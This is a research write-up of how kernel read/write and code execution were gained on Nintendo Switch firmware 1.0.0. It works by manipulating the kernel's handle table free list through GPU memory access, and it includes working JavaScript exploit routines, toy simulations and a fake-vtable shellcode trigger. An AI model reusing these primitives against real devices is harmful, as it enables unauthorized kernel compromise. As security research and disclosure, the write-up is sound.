The following is a write-up of how I initially achieved kernel code execution on the Nintendo Switch, very much inspired by hexkyz's write-ups. The work discussed was completed over the course of a single conversation between hthh and me during the evening of November 21st, 2017. A number of snippets are attached from that conversation as inline links, in the hopes that they'll be interesting to readers.
I'd recommend reading hexkyz's recent write-up on how the Switch was broken into via GPU DMA attacks. It's a great read!
In particular, he describes:
"Additionally, the kernel itself would start allocating memory outside of the carveout region if necessary. So, by exhausting some kernel resource (such as service handles) up to the point where kernel objects would start showing up outside of the carveout region, SciresM was able to corrupt an object and take over the kernel as well."
However, someone observing closely might notice that at this point neither hexkyz nor I had a copy of the plaintext of the Horizon kernel. Object corruption is difficult to implement when you don't know how the code that works with objects operates. This write-up is about how we actually gained arbitrary read/write (and thus dumped the kernel's code), as it's a pretty fun story.
Thanks to hexkyz's work with nvhax, we finally had a means to dump the entirety of the Switch's memory (DRAM), except for the portions that the OS "carved out" as secure. Hexkyz tested this out on 2.0.0 on November 18th-20th, and found that he could use nvhax to modify most of the system modules and all of the applets, but that the kernel and the special "built-in" system modules (FS, NCM, SM, PM, LOADER, and SPL) were all protected. During the day of November 21st, I tested this out on my own 1.0.0 console and my 3.0.0 console, and found unexpectedly that not only were the built-in system modules not protected on 1.0.0, but cursory visual inspection found what appeared to be kernel virtual addresses present and able to be modified. Overwriting a number of these caused the system to hang; this was a confirmation that the kernel was really using data stored in a location we could modify!
After some more investigation, I was sure that gaining kernel code execution would be possible, but that it would be very difficult without knowing how the kernel was using the objects I saw in memory -- one promising lead seemed to be the possibility of messing with a process's handles. For those unfamiliar with how the Horizon kernel operates, "handles" are how user processes interact with kernel objects. A handle is a 32-bit unique identifier corresponding to some object that the kernel maintains. When a process creates an object (for example, a shared memory), the kernel creates an entry for the object in the process's handle table, and returns the u32 identifier to the user process. When the process wants to interact with the object it created (for example, by mapping or unmapping a memory), it passes in the object's handle as an argument, and the kernel looks up (and validates) the handle in the process's table in order to get the address of the relevant object.
This seemed like a good vector for interacting with objects, as every time a kernel object is created for a process, a new handle table entry will be created, and handles can be easily closed via a call to svcCloseHandle, which will destroy the corresponding object. On the 3DS, kernel handle tables were fairly simple, and used a linked list. In addition, 3DS handle tables only reserved space for a small number of entries in protected kernel RAM; when more were needed, the 3DS would allocate an external array of entries in less safe FCRAM. The hope was that they wouldn't be too different on the Switch. Sure enough, looking through DRAM, I found what appeared to be handle table entries!
I reached out to hthh, hoping he and I could work on the problem together.
hthh started thinking about the best way to exploit the kernel with the primitives we had, noting that we were fairly lucky: the switchbrew folks (including plutoo, derrek, yellows8, and naehrwert) had obtained the kernel's code via a hardware attack earlier in the year, and plutoo in particular had publicly documented the structure of many kernel objects. He came up with several plausible plans of attack; meanwhile, I started working on getting more information on what exactly we could do. In particular, I had the idea to try locating the handle table for a specific process (I picked psc at random) -- I would dump DRAM, then open a new session to the psc service, which should create a new kernel object (and thus handle table entry) in the tables for both my process (nvservices) and psc's. From there, we could re-dump memory and check what had changed to find the right tables. Sure enough, this worked!
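As a rough illustration of the dump-and-compare step (not the code used at the time), here is a minimal sketch that reports which fixed-size slots differ between two dumps. The helper name `findChangedSlots`, the slot size parameter, and the toy buffers are all assumptions made for the example; real dumps would contain plenty of unrelated changes to filter out.

```javascript
// Hypothetical helper: compare two equally sized memory dumps (Uint8Arrays)
// and return the byte offsets of every slot whose contents changed.
function findChangedSlots(before, after, slotSize) {
    if (before.length !== after.length) {
        throw new Error('dumps must be the same size');
    }
    var changed = [];
    for (var off = 0; off + slotSize <= before.length; off += slotSize) {
        for (var i = 0; i < slotSize; i++) {
            if (before[off + i] !== after[off + i]) {
                changed.push(off);   // record the slot once, then move on
                break;
            }
        }
    }
    return changed;
}

// Toy example: a 64-byte "dump" in which one slot gets filled in.
var dumpBefore = new Uint8Array(64);
var dumpAfter = new Uint8Array(dumpBefore);   // copy of the first dump
dumpAfter[32] = 0x2a;                         // pretend a new entry appeared here
var changedOffsets = findChangedSlots(dumpBefore, dumpAfter, 16);
console.log(changedOffsets);
```

Scanning slot by slot rather than byte by byte keeps the output small enough to eyeball, which matters when the interesting change is a single new table entry.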
Our best idea was to try to craft a fake "KSharedMemory" object which mapped the kernel as readable to our process; if we could do that and then insert it into our process's handle table, we would theoretically be able to read/write the kernel like any other memory. However, some quick poking at that and hthh's other ideas proved most either didn't work, or required us to know information about how the kernel's memory was laid out (for example, to know where object vtables were located). On the bright side, we discovered that the structures for handle table entries were very simple. The entries were a simple contiguous array in memory -- an allocated entry and a free entry were both 16 bytes, and some quick experimentation revealed they had the following form:
struct k_ht_entry {
    uint16_t handle_id; // Simple, incrementing ID for the object.
    uint16_t obj_type;  // Used by the kernel to guard against type confusion errors.
    uint32_t padding;
    KObject *obj;       // Kernel virtual pointer to the object.
};
struct k_ht_free_entry {
    struct k_ht_free_entry *next_entry; // Pointer to the next entry in free linked-list.
    uint64_t padding;
};
Noting the linked-list structure seemed potentially abusable, I tested to confirm whether we could cause the kernel to use arbitrary memory when allocating handle table entries by modifying the free linked-list to point at memory we wanted it to use. It turned out that we could!
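To make the allocated-entry layout concrete, here is a small sketch that decodes one 16-byte entry from a raw dump. It assumes little-endian data and returns the pointer as a [low, high] pair of 32-bit halves; the function name `parseAllocatedEntry` and the sample bytes are made up for illustration.

```javascript
// Decode one allocated handle table entry (16 bytes, little-endian).
// `dump` is a Uint8Array; `offset` is the entry's byte offset within it.
function parseAllocatedEntry(dump, offset) {
    var view = new DataView(dump.buffer, dump.byteOffset + offset, 16);
    return {
        handleId: view.getUint16(0, true),   // uint16_t handle_id
        objType: view.getUint16(2, true),    // uint16_t obj_type
        // bytes 4..7 are padding
        obj: [view.getUint32(8, true), view.getUint32(12, true)]   // KObject *obj as [low, high]
    };
}

// Made-up sample entry, for illustration only.
var sampleEntry = new Uint8Array([
    0x07, 0x00,               // handle_id = 7
    0x05, 0x00,               // obj_type = 5
    0x00, 0x00, 0x00, 0x00,   // padding
    0x70, 0x56, 0x34, 0x12,   // obj, low 32 bits
    0xFE, 0xFF, 0xFF, 0xFF    // obj, high 32 bits
]);
var parsed = parseAllocatedEntry(sampleEntry, 0);
console.log(parsed.handleId, parsed.objType, parsed.obj[1].toString(16), parsed.obj[0].toString(16));
```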
After some more discussion, hthh came up with a clever idea for how we could gain a limited (and bad) read primitive in the kernel. He suggested that we take advantage of the linked-list structure to learn memory contents: we would modify the next_entry field of the first entry in the free list to point at the memory we wanted to read, then allocate two objects. The first allocation would cause the kernel to treat our pointer as a free table entry, and a second would allocate an entry using the memory at our pointer. While this would corrupt the memory we were trying to read, it would also cause the kernel to treat the first 8 bytes at the pointer we provided as the next_entry field of a free entry; by freeing the first object we allocated, we would cause the kernel to convert its allocated table entry back into a free one...and write the contents of the memory we wanted to read as the newly freed entry's next_entry field. We could then overwrite the next_entry field to point where it should, preventing further corruption problems. This worked, and provided us with a somewhat arbitrary read primitive -- our limitations were that we could only read from memory mapped R-W (as the kernel needed to be able to write an allocated entry to wherever we were trying to read from), and that we couldn't read from any memory addresses where corruption would cause a crash. Luckily, the kernel had a linear mapping for all of DRAM as R-W (including its own code!) on 1.0.0, so the only real limitation was on whether what we wanted to read was safely corruptible.
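The sequence of steps is easier to follow in a toy model. The sketch below is an assumption-laden simulation, not the real kernel: memory is an array of 8-byte words, an entry spans two words, and `ToyKernel`, `toyKernRead`, and the direct access to the free-list head are all hypothetical stand-ins (in the real attack the first free entry was located by inspecting DRAM).

```javascript
// Toy kernel: a free list threaded through `mem`, two words per entry.
function ToyKernel(mem, freeHead) {
    this.mem = mem;
    this.freeHead = freeHead;   // word index of the first free entry
    this.nextId = 1;
}

// Pop the free-list head and write an allocated entry over it.
ToyKernel.prototype.alloc = function() {
    var entry = this.freeHead;
    this.freeHead = this.mem[entry];   // trust next_entry of the popped entry
    this.mem[entry] = this.nextId++;   // handle_id word clobbers old contents
    this.mem[entry + 1] = 0xB0B;       // stand-in for the object pointer
    return entry;
};

// Push an entry back onto the free list.
ToyKernel.prototype.free = function(entry) {
    this.mem[entry] = this.freeHead;   // next_entry = old head
    this.mem[entry + 1] = 0;
    this.freeHead = entry;
};

function toyKernRead(kernel, mem, target) {
    var entry = kernel.freeHead;   // first free entry
    var savedNext = mem[entry];
    mem[entry] = target;           // "GPU write": redirect next_entry
    var h1 = kernel.alloc();       // pops entry; free head is now target
    kernel.alloc();                // pops target; free head is now mem[target]
    kernel.free(h1);               // kernel writes the leaked word into entry
    var leaked = mem[entry];       // "GPU read"
    mem[entry] = savedNext;        // repair the free list
    return leaked;
}

var toyMem = new Array(16).fill(0);
toyMem[0] = 2; toyMem[2] = 4; toyMem[4] = -1;   // free list: 0 -> 2 -> 4 -> end
toyMem[10] = 0x1234;                            // the "secret" word to read
var toyKernel = new ToyKernel(toyMem, 0);
var leakedWord = toyKernRead(toyKernel, toyMem, 10);
console.log(leakedWord.toString(16), toyMem[10]);
```

Note that `toyMem[10]` no longer holds the secret afterwards: the second allocation overwrote it, which is the corruption cost described above.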
Our code for implementing this technique was as follows:
nvcore.prototype.kernRead = function(addr) {
    var entry = this.getFirstFreeHandleEntry();            // Locate the next free handle table entry
    utils.log('First free entry at: '+entry.toString(16));
    this.gpuWrite(addr[0], entry);                         // Overwrite its next with our address
    this.gpuWrite(addr[1], entry + 4);
    var hnd1 = this.createSharedMemory(0x1000);            // Create two kernel objects
    var hnd2 = this.createSharedMemory(0x1000);
    this.closeHandle(hnd1);                                // Free the first object
    var retVal = this.gpuRead(entry);                      // Retrieve the value we wanted from next field
    this.gpuWrite((entry & 0x0FFFFFFF) + 0x20, entry);     // Clean up the entry.
    this.gpuWrite(0xFFFFFFFE, entry + 4);
    this.createSharedMemory(0x1000);                       // Leak memory to be safe against corruption.
    utils.log('*'+utils.paddr(addr)+' = '+utils.paddr(retVal));
    return retVal;
};
This was very powerful -- we could dump early portions of the kernel's code this way that were no longer being executed at runtime, and could also dump kernel objects to learn vtable addresses. However, attempts to implement the shared memory technique and other attack vectors seemed not to work; we were clearly doing something wrong, and we couldn't dump the parts of code we needed for debugging without causing a crash due to memory corruption. After some more back-and-forth, though, hthh had the winning idea for how we could get a dump of the kernel using handle table manipulation without needing to have dumped any of the kernel's code at all!
His observation was that we could potentially take advantage of the handle_id field inside an allocated entry. This is a simple, linearly-incrementing 16-bit ID number associated with the entry -- the kernel just uses it to ensure that handle values do not collide in userspace. Because it simply incremented, we could allocate and release entries repeatedly until the lower 8 bits of the id were one less than whatever value we wanted to write. Then, if we made the kernel allocate a handle table entry at the address we wanted to write to, it would write the correct byte into memory where we wanted it to. We could then, one byte at a time, write whatever we wanted at any memory address -- the only downsides would be that we would corrupt 15 bytes past the end of where we were writing to, because of the other fields in the entry the kernel would create, and that doing this would be very, very slow. In practice, we actually had to use a slightly different allocation pattern, since creating a handle table entry at an arbitrary address required creating an object, but I quickly wrote up some code to implement this technique:
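nvcore.prototype.kernWriteU8 = function(u8, addr, entry) {
    var hnd = this.createSharedMemory(0x1000);             // Allocate once to learn the current handle_id
    var val = this.gpuRead4(entry) & 0xFF;                 // Low byte of the ID the kernel just wrote
    this.closeHandle(hnd);
    var numTimes = u8 + 0x200 - val;                       // Distance from the current ID to the target byte
    numTimes -= 2;                                         // hnd2 below receives ID val + numTimes + 2
    numTimes &= 0xFF;
    utils.log('Writing '+u8.toString(16)+' requires '+numTimes+' allocations.');
    for (var i = 0; i < numTimes; i++) {
        this.closeHandle(this.createSharedMemory(0x1000)); // Burn one ID per create/close cycle
    }
    this.gpuWrite(addr[0], entry);                         // Point the free entry's next at the target address
    this.gpuWrite(addr[1], entry + 4);
    var hnd1 = this.createSharedMemory(0x1000);            // Consumes the free entry; free list head is now addr
    var hnd2 = this.createSharedMemory(0x1000);            // Entry written at addr; its low ID byte is u8
    this.closeHandle(hnd1);                                // Return the original entry to the free list
    this.gpuWrite((entry & 0x0FFFFFFF) + 0x10, entry);     // Clean up the entry.
    this.gpuWrite(0xFFFFFFFE, entry + 4);
}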
nvcore.prototype.kernWrite = function(val, addr) {
    if (typeof(val) == 'number') {
        val = [val, 0];
    }
    var entry = this.getFirstFreeHandleEntry();
    utils.log('ENTRY: '+entry.toString(16));
    for (var i = 0; i < 8; i++) {
        var u8 = 0xFF << (8 * (i % 4));
        u8 &= val[(i / 4) >>> 0];
        u8 >>= (8 * (i % 4));
        u8 &= 0xFF;
        utils.log('Writing '+u8.toString(16)+' to '+utils.paddr(utils.add2(addr, i)));
        this.kernWriteU8(u8, utils.add2(addr, i), entry);
    }
};
With our code written, hthh and I designed some simple test cases. First, we would write 0xdeadcafecafebabe to a readable memory location, to confirm that we could write what we wanted where we wanted. Then, we would write a RET instruction to the first four bytes of the kernel's code region, and then create a fake kernel object with a fake vtable that had every entry pointing to our shellcode, so that when we closed the object the virtual destructor call for our fake object would cause our code to run. We ran our tests, and they worked!
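The byte-at-a-time write and its 15 bytes of trailing corruption can be seen in a toy model. This sketch is a simplification under stated assumptions: `ToyHandleTable`, `allocAt`, and `writeByte` are hypothetical names, the 0xEE filler stands in for the other entry fields, and burning IDs is modeled by bumping a counter rather than by real create/close cycles.

```javascript
var ENTRY_SIZE = 16;

function ToyHandleTable(mem) {
    this.mem = mem;      // Uint8Array standing in for DRAM
    this.nextId = 1;     // 16-bit incrementing handle_id counter
}

// Write a 16-byte allocated entry at `addr`: a little-endian handle_id
// followed by 14 bytes of filler for the remaining fields.
ToyHandleTable.prototype.allocAt = function(addr) {
    var id = this.nextId;
    this.nextId = (this.nextId + 1) & 0xFFFF;
    this.mem[addr] = id & 0xFF;
    this.mem[addr + 1] = id >>> 8;
    for (var i = 2; i < ENTRY_SIZE; i++) {
        this.mem[addr + i] = 0xEE;
    }
};

// Burn IDs until the next one ends in `wanted`, then allocate at `addr`.
// Returns how many create/close cycles the burn would have cost.
ToyHandleTable.prototype.writeByte = function(addr, wanted) {
    var burns = (wanted - this.nextId) & 0xFF;
    this.nextId = (this.nextId + burns) & 0xFFFF;
    this.allocAt(addr);
    return burns;
};

// Write ascending, so each entry's junk is overwritten by the next byte.
ToyHandleTable.prototype.writeBytes = function(addr, bytes) {
    for (var i = 0; i < bytes.length; i++) {
        this.writeByte(addr + i, bytes[i]);
    }
};

var toyDram = new Uint8Array(64).fill(0x11);
var toyTable = new ToyHandleTable(toyDram);
toyTable.writeBytes(8, [0xbe, 0xba, 0xfe, 0xca]);
console.log(Array.prototype.slice.call(toyDram, 8, 12));
```

Writing in ascending address order is what makes this workable: every entry clobbers the bytes after it, but the next write repairs the first of those, so only the 15 bytes following the final byte stay corrupted.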
From there, it was just a matter of writing a payload that would copy the kernel to a physical address we could read (we chose 0xC0000000). We used godbolt to generate a simple copy payload that only used 14 instructions total, and I started running it. After that, all we could do was wait -- the technique we were using was really slow, taking up to 20 seconds per byte written, so it was almost a twenty-minute wait for our successful dump of the kernel to complete.
With a binary dump of the kernel in hand, things immediately became very simple -- we loaded the kernel into a disassembler, and I wrote a quick payload that would use our write in order to get a better arbitrary write primitive, and from there install custom SVCs to allow for arbitrary kernel reads and writes :)
None of this works on newer firmware versions, unfortunately, as starting in 2.0.0 the Horizon kernel no longer has external entry tables at all -- instead, every handle table object stores an array of 1024 entries inside the kernel's secure carveout. More than that, they also replaced the linked list with a simpler offset storage, and it is no longer possible to coerce the kernel to allocate new handle table entries at arbitrary locations even if you do somehow manage to overwrite a free entry. This probably indicates that the external tables were just a hold-over from when Horizon was targeting the 3DS, where they made more sense due to kernel memory constraints.
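The wait time follows from simple arithmetic. The sketch below assumes every one of the 14 instructions is a fixed 4-byte AArch64 instruction and that each byte costs the worst-case 20 seconds; it counts only the payload itself, not the other writes needed to trigger it.

```javascript
var INSTRUCTION_BYTES = 4;          // assumption: fixed-width AArch64 instructions
var payloadInstructions = 14;       // size of the copy payload
var worstCaseSecondsPerByte = 20;   // "up to 20 seconds per byte written"

var payloadBytes = payloadInstructions * INSTRUCTION_BYTES;
var worstCaseSeconds = payloadBytes * worstCaseSecondsPerByte;
var worstCaseMinutes = worstCaseSeconds / 60;
console.log(payloadBytes + ' bytes, up to ' + worstCaseMinutes.toFixed(1) + ' minutes');
```

That works out to 56 bytes and roughly 18.7 minutes in the worst case, consistent with a wait of almost twenty minutes.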
You can find a copy of the original script I wrote early in the morning on November 22nd to install arbitrary kernel read/write SVCs here.
You can also find a cleaned-up copy of the script with actual documentation plus better features that I wrote on November 24th to install kernel read/write/copy primitives here.
With any luck, the above can make its way into Pegaswitch for usage on 1.0.0 systems sometime shortly after hexkyz's nvhax code does. Enjoy! :)